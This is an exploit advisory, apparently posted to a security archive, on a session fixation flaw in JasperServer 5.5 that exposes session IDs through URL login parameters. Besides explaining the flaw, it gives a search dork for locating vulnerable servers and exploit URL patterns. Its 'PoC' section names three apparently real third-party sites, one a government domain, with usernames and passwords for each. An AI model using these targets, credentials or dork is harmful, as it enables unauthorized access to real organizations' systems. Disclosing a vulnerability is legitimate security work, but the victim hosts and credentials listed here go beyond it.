Jasper Server 5.5 Session Fixation

Jasper Server 5.5 Session Fixation: Posted May 9, 2014; Authored by Felipe Andrian Peixoto; Jasper Server versions 5.5 and below suffer from a session fixation vulnerability.; tags | exploit; SHA-256 | 5a8cd75ea1fc559c5e606aa75dc868afa95e2e08f85eb9edc66906672210da21; Download | Favorite | View

Jasper Server 5.5 Session Fixation

[+] Session Fixation / Hijacking on JasperServer

[+] Date: 09/05/2014

[+] Risk: High

[+] CWE number: CWE-384 

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.jaspersoft.com/

[+] Software Download : http://sourceforge.net/projects/jasperserver/

[+] Contact: felipe_andrian@hotmail.com

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: intitle:JasperServer + inurl:j_password // use your brain ;)

[+] Exploit : 

        http://host/patch//flow.html?_flowId=searchFlow&j_username=<username>&j_password=<password>

         or

        http://host/patch/j_acegi_security_check?j_username=<username>&j_password=<password>

As part of the login process, the assigned session ID is revealed in a URL parameter that alows Hijack the session of some user.

Example:

    Vul example: coopnet.leosoft.com.br

   GET /coopnet/j_acegi_security_check?j_username=teste&j_password=teste
   Host: coopnet.leosoft.com.br
   User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0
   Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 
   With a request like that the session ID of the user will be revealed in a url paramter:

       "JSESSIONID=4635974EAA38774EF00FB270933D3C7D"


    The application authenticates users with a direct post to the j_acegi_security_check, which does not invalidate the existing session
 before processing the login request.

                  <form method="POST" action="j_acegi_security_check">
                  <input type="text" name="j_username">
                  <input type="text" name="j_password">
                  </form>
 
   Because Of that is possible authenticate a user, or otherwise establishing a new user session, without invalidating any existing session.

[+] PoC : http://www2.emater.mg.gov.br/jasperserver/flow.html?_flowId=searchFlow&j_username=esloc&j_password=esloc
  
           j_username=esloc  & j_password=esloc

          http://jrs.logifleet.com/jrs471/flow.html?_flowId=homeFlow&j_username=Scheuchzer%7CScheuchzer&j_password=Scheuchzer

           j_username=Scheuchzer%7CScheuchzer & j_password=Scheuchzer

          http://jasper.ffex.net:8080/jasperserver/flow.html?_flowId=searchFlow&&j_username=ratequote&j_password=rateme9

           j_username=ratequote & j_password=rateme9


More About session fixation technique on : http://cwe.mitre.org/data/definitions/384.html

Top Authors In Last 30 Days

Red Hat 323 files
Ubuntu 71 files
Debian 21 files
LiquidWorm 12 files
Gentoo 8 files
Apple 6 files
Google Security Research 4 files
Spencer McIntyre 3 files
Jann Horn 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Jasper Server 5.5 Session Fixation

Jasper Server 5.5 Session Fixation

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Jasper Server 5.5 Session Fixation

Share This

Jasper Server 5.5 Session Fixation

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems